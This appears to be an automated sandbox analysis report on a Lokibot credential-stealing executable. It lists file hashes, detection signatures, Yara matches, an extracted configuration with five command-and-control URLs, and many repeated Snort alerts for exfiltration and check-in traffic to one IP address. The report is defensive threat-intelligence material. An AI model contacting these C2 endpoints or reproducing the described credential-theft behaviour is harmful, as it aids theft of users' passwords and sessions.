Loading ...

Play interactive tourEdit tour

Analysis Report Conan Fegan - Aluminium.exe

Overview

General Information

Sample Name:Conan Fegan - Aluminium.exe
Analysis ID:356211
MD5:708ee64939578fbb07010e20f6c7672c
SHA1:335dc9a9142b528848b8446be2afda844f6d673f
SHA256:f1a43d8b49bda3c88eb1c314c9460a92c0b467ea8db4c9086ac8e3bfe358e511
Tags:Loki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • Conan Fegan - Aluminium.exe (PID: 4748 cmdline: 'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe' MD5: 708EE64939578FBB07010E20F6C7672C)
    • Conan Fegan - Aluminium.exe (PID: 7008 cmdline: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe MD5: 708EE64939578FBB07010E20F6C7672C)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://www.ritcophysiotherapy.com.au/wap121/five/fre.php"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x1d6f8f:$des3: 68 03 66 00 00
            • 0x1db380:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x1db44c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackLoki_1Loki Payloadkevoreilly
                  • 0xa3864:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                  • 0xa3aac:$a2: last_compatible_version
                  0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                  • 0xa2aaf:$des3: 68 03 66 00 00
                  • 0xa6ea0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                  • 0xa6f6c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                  Click to see the 30 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: Conan Fegan - Aluminium.exeAvira: detected
                  Found malware configurationShow sources
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://www.ritcophysiotherapy.com.au/wap121/five/fre.php"]}
                  Machine Learning detection for sampleShow sources
                  Source: Conan Fegan - Aluminium.exeJoe Sandbox ML: detected

                  Compliance:

                  barindex
                  Uses 32bit PE filesShow sources
                  Source: Conan Fegan - Aluminium.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                  Source: Conan Fegan - Aluminium.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 4x nop then jmp 07A3C2B3h
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49745 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49747 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49751 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49751 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49751 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49796 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49814 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49815 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49816 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49817 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49817 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49817 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49818 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49819 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49820 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49821 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49821 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49821 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49822 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49822 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49822 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49823 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49824 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 203.170.84.89:80
